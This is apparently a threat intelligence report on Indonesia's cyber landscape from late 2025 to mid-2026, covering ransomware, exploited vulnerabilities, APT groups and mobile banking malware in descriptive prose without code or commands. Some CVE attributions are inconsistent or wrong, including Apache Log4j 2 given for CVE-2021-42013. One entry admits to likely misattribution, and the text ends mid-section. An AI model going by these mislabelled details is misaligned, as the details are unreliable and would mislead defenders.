THREAT LANDSCAPE INDONESIA

Published On : 2026-06-29
Share :
THREAT LANDSCAPE INDONESIA

EXECUTIVE SUMMARY

This report provides a threat intelligence assessment of the cyber risk landscape affecting Indonesian organizations between December 2025 and May 2026. The findings reflect a high-tempo, multi-vector environment driven by financially motivated ransomware operations, state-aligned espionage campaigns, industrialized mobile banking fraud, and persistent botnet compromise across government, financial, critical infrastructure, and citizen-facing digital services.

Ransomware remained the most disruptive threat category, with established and emerging operators maintaining consistent targeting across government, materials, healthcare, and information technology sectors through double-extortion tactics. State-aligned threat actors, primarily Chinese state-linked groups, conducted strategically timed espionage operations against government ministries, law enforcement, aviation, and critical minerals infrastructure, with campaigns calibrated to Indonesia’s domestic political and economic calendar.

Mobile banking fraud represented the most direct population-scale financial threat, with industrialized attack chains targeting Android users through phishing, social engineering, and malicious application delivery timed to the national tax filing season. Indonesia ranked seventh globally for active botnet compromise as of May 2026, with consumer IoT infrastructure extensively exploited as attack infrastructure. Successor botnet variants emerged rapidly following international law enforcement disruption in March 2026, confirming that structural vulnerabilities in Indonesian IoT ecosystems remain unresolved.

Dark web and underground forum activity targeting Indonesian data sets remained persistently elevated across all months of the reporting period, spanning political, healthcare, government, and education sector entities.

AI-weaponization of attack techniques, including deepfake-enabled fraud and adaptive malware evasion, accelerated materially during the period and is assessed as a growing force multiplier for adversaries targeting Indonesian organizations. Indonesia’s regulatory framework is advancing, but the transition period between legislative progress and full enforcement operationalization creates a window that sophisticated actors are positioned to exploit. Current security investment remains structurally insufficient relative to the scale of the threat environment, and organizations must treat continued multi-vector targeting as a baseline assumption, prioritizing resilience, detection maturity, and proactive threat intelligence as operational imperatives.

KEY FINDINGS

Ransomware Remains the Dominant Disruptive Threat
Ransomware activity continued to represent the most operationally and financially impactful risk to Indonesian organizations across the reporting period. LockBit5 and CoinbaseCartel led observed incident volumes, each accounting for approximately 20 percent of tracked cases, with Everest and WorldLeaks forming a consistent second tier at approximately 15 percent each. Double-extortion tactics combining encryption with data exfiltration were standard across campaigns. The fragmented RaaS ecosystem, with smaller groups including Medusa, SpaceBears, and RansomHouse accounting for additional incidents, demonstrated that Indonesia’s exposure extends well beyond the leading operators.

Government and Materials Sectors Are the Most Heavily Targeted
The Materials sector and Government and Civic organizations recorded the highest ransomware incident volumes, each accounting for five confirmed victims during the reporting period. Information Technology and Healthcare each registered three victims. Transportation and Logistics, Energy and Utilities, and Finance each recorded two victims. The breadth of sectoral targeting confirms the opportunistic and increasingly industrialized character of ransomware operations against Indonesian organizations regardless of sector, size, or geography.

Industrialized Mobile Banking Fraud via Coretax Impersonation
The most operationally significant campaign of the reporting period was the GoldFactory-attributed Coretax tax platform impersonation operation, which escalated sharply in January 2026 to coincide with Indonesia’s national tax filing season. The campaign combined phishing, WhatsApp impersonation of tax officers, voice phishing, and malicious APK sideloading to achieve full Android device compromise, enabling remote banking session takeover and unauthorized transactions across a potential target pool of 67 million residents. GigaBud.RAT and MMRat were deployed as the core mobile fraud toolkit within this campaign chain.

State-Aligned Espionage Campaigns Targeted Government, Aviation, and Critical Infrastructure
Amaranth-Dragon conducted the most clearly evidenced state-sponsored intrusion in Indonesia during the reporting period, exploiting CVE-2025-8088 through a fake civil servant salary decree archive timed to Indonesia’s August 2025 pay increase. Shadow Campaigns (TGR-STA-1030/UNC6619) compromised an Indonesian airline at Soekarno Hatta International Airport and government-linked systems tied to mining and aviation procurement, as part of a broader multi-country espionage operation with targeting timed to real-world diplomatic and economic developments. Both operations reflected well-resourced, strategically motivated actors rather than opportunistic intrusions.

AI-Weaponization Expanding the Attack Surface at Scale
AI-assisted phishing success rates reached 54 to 60 percent during the reporting period. Deepfake incidents increased 1,400 percent year-over-year from 2024 to 2025. Deepfake audio was weaponized in vishing campaigns impersonating bank officers and government tax officials. Underground discussions confirmed rapid acceleration in the use of generative AI for phishing automation, adaptive malware generation, and prompt-injection exploitation. Indonesia’s growing AI adoption without mature governance frameworks creates additional enterprise risk exposure assessed as materially elevated heading into the second half of 2026.

SURXRAT V5 Represents a Mature Mobile Malware-as-a-Service Threat
SURXRAT V5, operated by an Indonesia-based threat actor selling tiered access to global resellers, demonstrated mature malware-as-a-service capabilities including OTP interception, real-time banking session monitoring, and experimental AI-assisted behavioral evasion. Distribution through localized Indonesian-language lures, WhatsApp social engineering, and unofficial APK repositories confirmed the operator’s sophistication in targeting Indonesia’s mobile banking user base at scale.

SilverFox Expanded Tax-Themed Fraud Operations to Include Indonesian Targets
SilverFox, a China-linked cybercrime group, expanded a multi-country tax-themed phishing operation to include Indonesian organizations during January and February 2026, deploying the ValleyRAT backdoor alongside the previously undocumented ABCDoor Python implant. More than 1,600 malicious emails were recorded across tracked waves, targeting industrial, consulting, retail, and transportation sector organizations with fake tax authority correspondence engineered to exploit compliance anxieties.

Cloud Platforms Abused for Command-and-Control Across Multiple Threat Actors
Lotus Blossom migrated C2 infrastructure to Dropbox, Twitter/X, and Zimbra mail services. Amaranth-Dragon used Dropbox to stage payloads and employed Cloudflare-fronted geofenced infrastructure ensuring command-and-control servers responded only to targeted country specific IP ranges. This consistent pattern of legitimate platform abuse across multiple threat actor groups materially reduced detection visibility through conventional network monitoring and represents a structural detection challenge for Indonesian defenders.

Indonesia Ranks Seventh Globally for Botnet-Related Compromise
As of early May 2026, approximately 68,000 to 85,000 active compromised Indonesian IPs were identified involving routers, DVRs, IP cameras, and Android IoT devices. The Aisuru and Kimwolf Mirai-derived botnets infected an estimated one to four million devices globally with significant Indonesian concentration, enabling DDoS attacks exceeding 200 million requests per second and reaching approximately 31.4 Tbps. Following the March 2026 international law enforcement disruption of these botnets’ infrastructure, successor variants Nexcorium and Tuxnokill rapidly emerged and continued automated exploitation of Indonesian consumer IoT infrastructure.

Dark Web Activity Targeting Indonesian Data Sets Remained Persistently Elevated
Data breach activity was the most prevalent threat category on underground forums throughout the reporting period, peaking in December 2025 and sustaining elevated volumes through May 2026. Confirmed dark web incidents included a political party data breach claim, a healthcare application user dataset of approximately 192,000 records offered at USD 200, a state-owned fisheries enterprise personnel record exposure, a government website database of 2,006 personnel records, and an Education Ministry platform data set. Hacktivist activity represented the second most prominent category, ranging from 16 incidents in December to a peak of 37 in March.

Regulatory Transition Period Creates a Temporary but Exploitable Exposure Window
Indonesia’s Cybersecurity and Cyber Resilience Bill remained pending enactment as of May 2026, and the Personal Data Protection Agency had not yet reached full operational capacity. The transition between legislative intent and enforcement operationalization creates ambiguity in oversight authority that sophisticated actors familiar with Indonesia’s regulatory calendar may seek to exploit. Organizations in early compliance preparation stages present softer security postures that are disproportionately attractive to both financially motivated and state-sponsored adversaries.

Exploitation of Legacy and Current CVEs Across Government and Enterprise Environments
CVE-2026-41940 (Ivanti Pulse Connect Secure), CVE-2021-42013 (Apache Log4j 2), CVE-2017-9841 (PHPUnit), and CVE-2023-20198 (Cisco IOS XE) were among the most actively exploited vulnerabilities in Indonesian environments during the reporting period. Confluence was the most frequently targeted product with seven observed incidents. The co-presence of newly disclosed and long-standing unpatched vulnerabilities confirms a structural patch management deficit across Indonesian government and enterprise infrastructure.

RANSOMWARE ASSESSMENT

Ransomware activity remains a significant threat in Indonesia, with a mix of established and emerging groups contributing to the overall attack landscape.

Figure 1: Ransomware Group Targeting Indonesia

At the top tier, LockBit5 and CoinbaseCartel are the most active groups, each accounting for approximately 20% of the total observed incidents. Their leading share suggests sustained operational capability, effective victim targeting, and continued prominence within the ransomware ecosystem.

A second tier is formed by Everest and WorldLeaks, each representing roughly 15% of observed incidents. Their presence indicates consistent campaign activity and an ability to maintain operational momentum, although at a lower scale than the leading groups.

The next level of activity includes Tengu, TheGentlemen, and Nova, each contributing approximately 10% of the total incidents. These actors demonstrate moderate levels of activity, likely reflecting more selective targeting strategies or smaller operational footprints.

The remaining portion of the landscape consists of Medusa, SpaceBears, and RansomHouse, each accounting for approximately 5% of observed incidents. While their individual shares are relatively small, their continued presence highlights the fragmented nature of the ransomware ecosystem, where numerous smaller groups remain capable of conducting disruptive attacks and exploiting vulnerable organizations.

Figure 2: Industries Targeted

The Materials sector and Government & Civic organizations were the most heavily targeted industries, each recording five victims. Their prominence suggests that attackers are prioritizing organizations whose disruption can result in significant operational, financial, or societal impact, potentially increasing the likelihood of ransom payments.

Information Technology and Healthcare, each accounting for three victims. These sectors remain attractive targets due to their critical role in supporting business operations and managing sensitive information, making service disruptions particularly costly.

Moderate levels of targeting were observed across Transportation & Logistics, Energy & Utilities, and Finance, with two victims recorded in each sector. The continued attention on these industries reflects attackers’ interest in organizations that support essential infrastructure and economic activity.

The remaining activity was distributed among Manufacturing, Real Estate & Construction, Automotive, and Education, each reporting one victim. While these sectors experienced fewer incidents during the reporting period, their inclusion highlights the opportunistic nature of ransomware campaigns, which continue to affect organizations across a wide range of industries regardless of size or sector.

RANSOMWARE INCIDENTS

On May 29, 2026, the ransomware group Nova claimed to have targeted an Indonesian government service provider. The group alleged that it had gained access to approximately 8 GB of data and threatened to release the data if negotiations were not completed within the specified timeframe. The nature of the compromised data was not disclosed.

On Apr 5, 2026, the ransomware group Nova added a government service provider in Indonesia to their data leak site. The published data is claimed to be around 4GB.

On Mar. 2, 2026, the ransomware group LockBit5 added an Indonesia-based energy and natural resources provider to their data leak site, and allegedly exposed data associated with the organization.

On Feb. 21, 2026, the ransomware group TheGentlemen reportedly targeted an Indonesian airline service provider.

VULNERABILITIES IN FOCUS

Based on the 90-day average detection rates, CVE-2026-41940 ranks highest among the observed vulnerabilities, followed by CVE-2026-3055, CVE-2021-42013, CVE-2017-9841, and CVE-2023-20198. The prominence of both recently disclosed vulnerabilities and long-standing flaws highlights the dual challenge facing defenders: rapidly responding to emerging threats while continuing to address legacy weaknesses that remain widely exposed. The sustained activity surrounding older vulnerabilities demonstrates that attackers consistently exploit unpatched systems, whereas the appearance of newer CVEs reflects the ongoing adaptation of threat actors to newly discovered attack opportunities. Together, these trends underscore the importance of timely patch management, continuous monitoring, and proactive vulnerability remediation across both modern and legacy environments.

CVE ID CVSS Products Affected Threat Actors Exploit Available Exploitation Context
CVE-2026-41940 9.8 cPanel & WHM Mr_Rot13 Link Initial access and web hosting infrastructure compromise
CVE-2026-3055 9.8 Citrix NetScaler ADC and NetScaler Gateway Nil Link Remote exploitation of internet-facing access infrastructure
CVE-2021-42013 9.8 Apache HTTP Server Storm-1061 Link Path traversal and remote code execution on vulnerable web servers
CVE-2017-9841 9.8 PHPUnit RondoDox botnet, Zerobot/Mirai Link Remote code execution through exposed PHPUnit testing scripts
CVE-2023-20198 10.0 Cisco IOS XE Software Salt Typhoon Link Authentication bypass, privileged account creation, and persistent access

Confluence was the most frequently targeted product, accounting for seven observed incidents. Its importance highlights the continued exploitation of collaboration and knowledge-management platforms, which often contain sensitive organizational data and are commonly exposed to external networks.

Junos OS (J-Web) with four incidents, indicates sustained interest in network management interfaces that can provide direct administrative access to critical infrastructure devices.

Several products recorded two incidents each, including Endpoint Manager Mobile (EPMM), Citrix ADC and Citrix Gateway, TeamCity, GeoServer, and PAN-OS. These platforms span remote access, device management, software development, and network security functions, making them attractive targets for threat actors seeking initial access, privilege escalation, or lateral movement opportunities.

The remaining activity was observed against cPanel and WHM, Apache HTTP Server, and PHPUnit, each accounting for one incident. Although less frequently targeted during the reporting period, these products remain notable due to their widespread deployment and history of exploitation in both opportunistic and targeted attacks.

Overall, the distribution demonstrates that attackers continue to prioritize externally accessible enterprise applications, management interfaces, and infrastructure services, leveraging both recently disclosed vulnerabilities and long-standing weaknesses to gain unauthorized access to organizational environments.

DARK-WEB AND UNDERGROUND CHATTER

Entities in Indonesia continued to be disproportionately targeted by threat actors operating on underground forums and dark web marketplaces. Our monitoring identified numerous underground posts, data sales, and breached database advertisements specifically targeting organizations in Indonesia across financial, government, telecom, and industrial sectors. The prevalence of Indonesia-specific data sales, combined with active discussions among cybercriminals regarding exploitation techniques targeting local infrastructure, indicates sustained interest in the region as a high-priority target. The following analysis details the types of data being traded, threat actor activity patterns, and strategic implications for Indonesian organizations.

Data breach activity remained the most prevalent threat category throughout the reporting period, consistently accounting for the highest number of observed incidents. Peak activity was recorded in December, followed by elevated levels in January, February, March, and April before declining to 70 incidents in May. This sustained volume suggests continued attacker focus on data theft for financial gain, extortion, and unauthorized resale, often enabled through compromised credentials, exposed services, and exploitation of vulnerable internet-facing systems.

Hacktivism represented the second most prominent activity type, ranging from 16 incidents in December to a peak of 37 incidents in March, before declining to 27 incidents in May. The persistence of hacktivist operations indicates ongoing use of cyber activity to advance political, ideological, or social objectives, particularly during periods of heightened geopolitical tension.

Web exploitation activity remained consistently observed across all months, reaching its highest level in December (42) and maintaining moderate levels thereafter. This trend highlights the continued use of vulnerable web applications, exposed management interfaces, and unpatched services as common initial access vectors for threat actors.

DDoS activity remained comparatively limited, fluctuating between 6 and 20 incidents during most months. Although less frequent than other threat categories, its continued presence suggests that denial-of-service attacks remain a viable tactic for disruption, coercion, or diversionary purposes when combined with other malicious activities.

Data leak incidents were the least frequently observed category, with only isolated occurrences throughout the reporting period. However, their persistence demonstrates that unauthorized disclosure of sensitive information continues to pose a risk, particularly when associated with broader breach or extortion campaigns.

Overall, the data indicates a threat landscape dominated by data breach operations, supported by persistent hacktivist campaigns and web exploitation activity, while DDoS attacks and data leaks remain secondary but recurring elements of the broader cyber threat environment.

APT ACTIVITY IN INDONESIA

Amaranth-Dragon (APT41 Nexus) – Chinese State-Aligned
Amaranth-Dragon represented the most clearly evidenced threat against Indonesia during the reporting period. Active since at least March 2025, the group ran narrowly scoped campaigns across Southeast Asia tailored to local political and economic events. On August 18, 2025, it targeted Indonesia with an archive disguised as an official civil servant salary decree, timed to coincide with a genuine 8 percent salary increase that took effect on August 1, 2025. This campaign marked the first observed use of CVE-2025-8088, a WinRAR path traversal flaw, to drop a malicious script into the Windows Startup folder for persistence. A separate early September 2025 campaign against Indonesia distributed a password-protected RAR archive from Dropbox delivering TGAmaranth RAT, a Telegram-controlled remote access trojan.

Across the region, the group paired a custom Amaranth Loader with the Havoc C2 framework, using Cloudflare fronted infrastructure with strict geofencing so command-and-control servers only responded to targeted countries. Tooling and infrastructure overlaps point to a direct affiliation or shared resourcing with APT41, suggesting this activity is part of a broader Chinese state-aligned intelligence collection effort focused on government and law-enforcement targets.

Target Industries: Government institutions and law enforcement agencies across Southeast Asia, including Indonesia.

Target Technologies: WinRAR (CVE-2025-8088), Windows systems, Startup folder persistence mechanisms, Cloudflare-fronted infrastructure.

Initial Access: Spear-phishing with RAR archives using geopolitically and locally themed lures, such as a fake civil servant salary decree timed to Indonesia’s August 2025 salary increase.

Key TTPs: Exploitation of CVE-2025-8088 to drop malicious files into Startup folders, geofenced command and control that only responds to regional IP addresses, custom Amaranth Loader, Havoc C2 framework, Telegram-controlled TGAmaranth RAT, AES encrypted payloads decrypted in memory.

Motivations: Long-term geopolitical intelligence collection against government and law-enforcement targets, campaigns timed to coincide with sensitive local political developments and official decisions.

Shadow Campaigns / TGR-STA-1030 / UNC6619 – State-Aligned, Likely Asia Based
Shadow Campaigns was one of the largest state-aligned espionage operations identified globally during the reporting period, with confirmed Indonesian compromises occurring within a broader campaign spanning 37 countries and reconnaissance touching 155 nations between November and December 2025. First identified by Unit 42 while investigating phishing against European governments, the group demonstrated a clear focus on countries in Asia and Oceania bordering the South China Sea and the Gulf of Thailand, routinely probing Indonesia, Thailand, and Vietnam.

Within Indonesia, the group compromised an Indonesian airline operating out of Soekarno Hatta International Airport, assessed as likely linked to competing aircraft procurement interests, along with access to law enforcement and airport linked government systems tied to mining and aviation developments. The group used Microsoft Exchange exploitation, Cobalt Strike, and a custom Linux rootkit, with targeting consistently timed to real world diplomatic and economic events rather than appearing opportunistic, reflecting a well-resourced actor pursuing sustained strategic intelligence collection.

Target Industries: Government ministries, law enforcement and border control, aviation, critical infrastructure, finance and trade related departments.

Target Technologies: Microsoft Exchange, SSH services, Linux systems, enterprise network infrastructure.

Initial Access: Exploitation of known vulnerabilities, phishing campaigns, targeted reconnaissance and scanning of government infrastructure.

Key TTPs: Use of Cobalt Strike, custom Linux rootkit, Exchange exploitation, large scale reconnaissance preceding intrusion, targeting timed to align with economic and diplomatic developments such as mining and aviation procurement activity.

Motivations: Strategic, economic and political intelligence collection, with confirmed compromise of an Indonesian airline at Soekarno Hatta International Airport linked to aircraft procurement interests, alongside access to law enforcement and airport linked government systems.

Lotus Blossom / Lotus Panda / Billbug – Chinese State-Linked
Lotus Blossom’s link to Indonesia rests mainly on a long historical footprint rather than a confirmed incident within this specific window. Active since at least 2009, the group has been described since 2015 as targeting government and military entities across Hong Kong, Taiwan, Vietnam, the Philippines, and Indonesia, making Indonesia part of its longstanding regional interest even without a freshly disclosed Indonesia specific intrusion in this period.

The group’s most significant confirmed activity in the window was a Notepad++ supply chain compromise, tracked as CVE-2025-15556, running between June and December 2025 and disclosed in February 2026. By hijacking the WinGUp updater’s unverified update mechanism, the group selectively delivered a new backdoor named Chrysalis to confirmed victims in the Philippines, Vietnam, El Salvador, and Australia. Indonesia does not appear among the named victims. Separately, the group continued using its Sagerunex backdoor with cloud-based command and control through Dropbox, Twitter/X, and Zimbra webmail, though this shift was documented in early to mid-2025 and predates the current reporting window.

Lotus Blossom remains a credible long-term threat to Indonesia given its history and its willingness to exploit software supply chains, but the specific intrusions confirmed during this period point to other countries rather than Indonesia itself.

Target Industries: Government agencies, telecommunications, military and defense adjacent organizations, manufacturing, critical infrastructure (historical targeting pattern includes Indonesia, though the specific 2024 to 2026 campaigns documented do not name Indonesia as a confirmed victim).

Target Technologies: Windows systems, Notepad++ update infrastructure (WinGUp), cloud platforms including Dropbox, Twitter/X and Zimbra mail systems, Chrome browser credential stores.

Initial Access: Spear-phishing with malicious attachments, watering hole attacks, supply chain compromise through the Notepad++ update mechanism (CVE-2025-15556).

Key TTPs: Sagerunex modular backdoor, Chrysalis backdoor delivered via DLL sideloading, cloud-based command and control blending with legitimate traffic, credential extraction from browsers, reverse SSH tooling, living off the land techniques using legitimate administrative utilities.

Motivations: Long-term government and military intelligence collection across Southeast Asia, with Indonesia named in the group’s broader historical target set since at least 2015, though confirmed victims in the most recent disclosed campaigns are the Philippines, Vietnam, El Salvador and Australia rather than Indonesia directly.

SilverFox / Monarch / SwimSnake / The Great Thief of Valley / UTG-Q-1000 / Void Arachne – China-Linked Cybercrime
SilverFox, also tracked under aliases including Monarch, SwimSnake, The Great Thief of Valley, UTG-Q-1000, and Void Arachne, is a China based threat actor that has steadily evolved from delivering commodity remote access tools toward a more modular, multistage toolset blending public tooling with custom implants. During the reporting period, the group expanded a tax themed phishing operation that began against Indian organizations in December 2025, using fake notices, before pivoting to a near identical wave against Russian organizations in January 2026. Kaspersky’s subsequent investigation confirmed the operation had broadened further to include companies in Indonesia and South Africa, demonstrating the group’s willingness to exploit similar regulatory and compliance anxieties across multiple jurisdictions rather than treating any single country as a one-off target.

The operation’s core innovation was the pairing of a customized RustSL loader, pulled from a public GitHub repository and modified for evasion, with the well-known ValleyRAT backdoor and a previously undocumented Python based implant named ABCDoor. ABCDoor itself was not newly developed for this campaign. Kaspersky’s retrospective analysis traced its presence in the group’s arsenal back to at least December 2024, with real world deployment beginning in the first quarter of 2025, meaning the Indonesia and South Africa expansion represents a geographic broadening of an already mature toolset rather than the debut of new malware. More than 1,600 malicious emails were recorded across the tracked waves between early January and early February 2026 alone, hitting organizations primarily in industrial, consulting, retail, and transportation sectors.

Target Industries: Industrial manufacturing, consulting, retail, transportation, and trade sector organizations, with tax and finance themed lures aimed broadly at corporate back office and compliance functions.

Target Technologies: Windows enterprise environments, email gateways, clipboard data, screen content, pythonw.exe background processes used for stealthy execution.

Initial Access: Phishing emails disguised as official tax authority correspondence, typically warning of tax audits or violations, using either RAR archives with disguised executables or PDF attachments containing external download links to bypass email security gateways.

Key TTPs: Modified RustSL loader for initial execution and evasion, deployment of ValleyRAT for core command and control and plugin retrieval, delivery of the ABCDoor Python backdoor enabling near real time multi-screen streaming, clipboard access, DPAPI based file encryption, and self-updating, alongside a configurable victim country list that the operators have expanded over successive campaign waves.

Motivations: Financially motivated cybercrime built on credential theft, data exfiltration, and remote system control, with the group’s exploitation of trusted regulatory and tax authority branding indicating a deliberate strategy of maximizing victim compliance across whichever jurisdictions it chooses to target next.

Mustang Panda / TA416 / RedDelta / BRONZE PRESIDENT — Chinese State-Linked
Mustang Panda is a long running Chinese state linked espionage group with a well-documented history of retooling its malware lineup while shifting geographic focus to match Beijing’s evolving intelligence priorities. In March 2026, researchers at Acronis identified a new variant of the group’s LOTUSLITE backdoor, attributing the activity to Mustang Panda with moderate confidence based on shared code lineage, persistence mechanisms, and residual build artifacts such as a carried over KugouMain export. The campaign marked a tactical shift in delivery tradecraft, moving from the CHM based delivery previously used in the group’s US government targeting toward JavaScript loaders and DLL sideloading, while simultaneously pivoting geographically away from prior US policy targets toward a new combination of financial sector and diplomatic targeting.

Every available source describing this specific LOTUSLITE campaign identifies its victims as Indian banking sector employees, lured with malicious CHM files disguised as support requests and fake HDFC Bank pop ups, alongside South Korean and US policy professionals targeted separately through spoofed Gmail accounts and Google Drive hosted documents. No source in the available reporting names Indonesian banking institutions or any Indonesian organization as a victim of this campaign. Given the close naming similarity between India and Indonesia, this entry should be treated as a likely misattribution rather than confirmed Indonesia targeting unless a separate, distinctly sourced incident can be identified.

Target Industries: Banking and financial services, foreign policy and diplomatic communities focused on Korean peninsula and Indo-Pacific affairs.

Target Technologies: Compiled HTML (CHM) files, JavaScript loaders, DLL sideloading using legitimate signed executables, dynamic DNS based command and control infrastructure over HTTPS.

Initial Access: Malicious CHM files embedding a legitimate executable and a rogue DLL alongside a deceptive HTML prompt, which silently retrieves and executes JavaScript malware from a remote server before extracting and running the LOTUSLITE payload through DLL sideloading.

Key TTPs: Remote shell access, file operations, session management, incremental code maintenance and reuse across campaigns, and a demonstrated pattern of rapid geographic and sectoral pivoting using the same core implant.

Motivations: State-aligned espionage focused on financial intelligence and foreign policy monitoring rather than financial gain, consistent with Mustang Panda’s broader mandate of supporting Chinese strategic and geopolitical intelligence needs, though this specific campaign’s documented targeting does not currently extend to Indonesia.

MALWARE ACTIVITY IN INDONESIA

SURXRAT V5 Android RAT – Operated by Indonesian Threat Actor
SURXRAT V5 represented one of the most technically capable Android remote access trojans observed, operated by an Indonesia based threat actor selling tiered access to global resellers. The malware demonstrated mature malware-as-a-service capabilities, intercepting one-time passwords, enabling unauthorized financial transactions, and incorporating experimental AI-assisted evasion mechanisms designed to bypass behavioral detection systems. Distribution was observed through localized Indonesian-language lures, including messaging application impersonation and fake application packages distributed through social media channels and unofficial APK repositories.

Target Technologies: Android mobile devices, mobile banking applications, OTP-based authentication systems, messaging platforms used for two-factor authentication delivery.

Initial Access: Sideloading through unofficial APK repositories, social engineering via WhatsApp and Telegram directing victims to download fraudulent applications, distribution through compromised social media accounts.

Key TTPs: OTP interception through SMS access permissions, real-time banking session monitoring through screen capture, unauthorized transaction initiation, AI-driven detection evasion through behavior randomization, exfiltration of device contacts and installed application lists for downstream targeting.

Coretax RAT
Beginning towards the end of 2025 and escalating sharply in early 2026, the Coretax RAT emerged as a significant threat to Indonesia’s mobile banking sector. Attackers used applications mimicking the official government tax platform DJP Online to deliver the RAT to Android devices. The malware exploited accessibility service permissions and disabled screen mirroring protections to enable remote banking session takeover. Several banks informally acknowledged that customers were compromised through this malware strain. Analysis confirmed that targeted applications had their security controls removed prior to repackaging, indicating a sophisticated preparation phase before distribution.

Target Technologies: Android mobile banking applications (particularly BRImo and peer applications from major Indonesian banks), government tax platform authentication flows, accessibility service frameworks.

Initial Access: Fraudulent APK files distributed through phishing websites, WhatsApp impersonation of tax officers directing victims to download fake Coretax applications, vishing calls impersonating DJP Online tax authority personnel.

Key TTPs: Accessibility service abuse to bypass banking application security controls, screen mirroring interception, credential exfiltration from banking sessions, remote transaction authorization, disabling of platform-level security protections prior to deployment.

MIMICRAT
MIMICRAT was distributed through advanced ClickFix campaigns utilizing compromised websites and Indonesian-language lures supported as one of seventeen localized languages during the reporting period. The malware functioned as a remote access trojan designed to bypass security controls by convincing users to execute commands themselves through fake verification prompts, mimicking legitimate Cloudflare or browser security checks. Once executed, MIMICRAT enabled persistent remote access, token theft, and lateral movement within compromised environments.

Target Technologies: Windows enterprise environments, browser-based applications, authentication token stores, enterprise collaboration platforms.

Initial Access: ClickFix-style fake CAPTCHA pages on compromised legitimate websites, Indonesian-language social engineering prompts directing users to execute malicious PowerShell commands, malvertising through compromised advertising networks.

Key TTPs: User-executed payload delivery bypassing endpoint security controls, authentication token theft, persistent remote access maintenance, lateral movement using stolen credentials, data exfiltration from compromised enterprise environments.

GigaBud.RAT and MMRat
Both GigaBud.RAT and MMRat were deployed by the GoldFactory threat cluster as part of the Coretax tax season fraud campaign. GigaBud.RAT specialized in screen recording and OTP interception, while MMRat enabled real-time device control and banking transaction manipulation. The combined deployment of these two tools within a single attack chain demonstrated GoldFactory’s mature, modular approach to mobile-banking fraud, with each tool contributing a specific capability to the overall intrusion lifecycle.

Target Technologies: Android mobile banking applications, real-time payment platforms, OTP-based authentication flows.

Initial Access: Delivered as malicious APK files through phishing infrastructure established to impersonate the Coretax web platform.

Key TTPs: Screen recording during active banking sessions, OTP interception and forwarding, real-time remote device control, unauthorized transaction initiation, device information exfiltration for fraud facilitation.

Infostealers (Lumma Stealer and AgentTesla)
Credential-stealer malware activity remained widespread across Indonesian financial and enterprise environments during the reporting period. Lumma Stealer reportedly infected more than 14,000 devices in Indonesia during the first half of 2025, with infections continuing into the December 2025 to May 2026 window. AgentTesla campaigns were primarily associated with business email compromise workflows impacting Indonesian financial services and logistics operations, where attackers leveraged mailbox access to manipulate payment processes and intercept financial communications.

Target Technologies: Windows browsers (Chrome, Edge, Firefox), email clients, cryptocurrency wallet applications, enterprise communication platforms, point-of-sale systems.

Initial Access: Spear-phishing with macro-enabled documents, malvertising through compromised advertising networks, trojanized software installers distributed through unofficial channels, drive-by downloads from compromised legitimate websites.

Key TTPs: Browser credential harvesting from saved passwords and autofill data, email credential extraction enabling business email compromise, cryptocurrency wallet targeting and private key theft, clipboard hijacking for transaction manipulation, keylogging for credential interception across enterprise applications.

POTENTIAL EMERGING THREATS TO INDONESIA

Agentic AI as an Offensive Weapon
There is a rapid acceleration in underground discussions around weaponizing generative AI tools for offensive cyber operations targeting Indonesian environments. Specific use cases being explored and operationalized by threat actors include AI-generated malware with adaptive evasion, hyper-personalized phishing lures crafted from Indonesian-language social media content and public data, and adversarial attacks on AI systems deployed by Indonesian financial institutions. AI-powered phishing success rates already reached 54 to 60 percent during the reporting period, with deepfake audio used in vishing campaigns to impersonate bank officers and government tax officials with high convincingness. As Indonesian enterprises rapidly adopt AI without mature governance frameworks, the risk of data leakage through prompt injection and AI system compromise is assessed as materially elevated heading into the second half of 2026.

Zero-Click Mobile Exploit Risk for High-Value Individuals
Indicators identified during the reporting period suggest a rising pattern of non-interactive mobile device compromise targeting politically sensitive individuals, executives, journalists, civil society leaders, and legal professionals operating in Indonesia. Evidence points to infiltration of smartphones without user interaction, with payloads functioning as persistent backdoors granting remote access to device data, communications, and location. Given Indonesia’s role as a significant democratic state with active civil society, independent media, and a complex political environment involving relations with China, the United States, and Australia, executives, legal professionals, journalists, and political figures face elevated and growing mobile surveillance risk from state-aligned actors.

Supply Chain Compromise Escalation
Supply chain compromise through trojanized software, firmware updates, and hardware implants has emerged as a critical escalating threat vector with direct impact on Indonesian organizations. Intelligence indicates increasing sophistication in supply chain targeting, particularly affecting telecommunications providers, government software vendors, and VPN and security appliance manufacturers serving the Asia-Pacific region. Lotus Blossom’s confirmed abuse of Notepad++ update mechanisms and PlushDaemon’s trojanized VPN installer supply chain vector demonstrate that this threat has moved from theoretical to operational within Indonesia’s geographic and technological neighborhood. Indonesian government procurement of network hardware and security appliances without formal supply chain assurance validation represents a structural vulnerability.

IoT and Smart Infrastructure Exploitation
Indonesia’s rapid digitalization includes extensive deployment of smart devices, building management systems, and IoT-enabled public infrastructure across urban centers including Jakarta, Surabaya, and Bandung. These deployments frequently operate outside structured patch management cycles, creating persistent soft targets for intrusion and lateral movement. Smart city infrastructure linked to critical services including transportation, utilities, and public safety represents a particularly high-consequence exposure surface. Malware incidents targeting smart devices in Indonesia showed significant year-over-year increases, with trojans disguised as legitimate applications remaining the dominant delivery mechanism.

Deepfake-as-a-Service Industrialization
Deepfake-as-a-service platforms democratized access to high-quality voice and video synthesis during the reporting period, with AI-powered deepfakes involved in over 30 percent of high-impact corporate impersonation attacks in the broader region during 2025. In Indonesia specifically, deepfake audio was weaponized in vishing campaigns impersonating tax officers and bank officials as part of the Coretax fraud campaign. Deepfake technology was also documented in broader disinformation operations targeting Indonesian political figures and public institutions. The combination of Indonesia’s large internet-connected population, active social media ecosystem, and limited deepfake detection awareness create conditions for rapid escalation of deepfake-enabled fraud at scale.

Cryptocurrency and Digital Asset Infrastructure Targeting
Following the Indodax breach in late 2024, Indonesian cryptocurrency infrastructure remained a sustained high-priority target for Lazarus Group and financially motivated actors during the reporting period. Indonesia’s growing retail cryptocurrency adoption, expanding DeFi participation, and development of digital payment infrastructure create an expanding target surface. The combination of relatively limited security maturity in domestic cryptocurrency platforms and the high financial returns available from successful intrusions positions Indonesian digital asset infrastructure as a persistent priority target for sophisticated financially motivated adversaries.

KEY EVENTS IN INDONESIA: ELEVATED CYBER RISK PERIODS

High-Risk Digital Economy and Financial Events

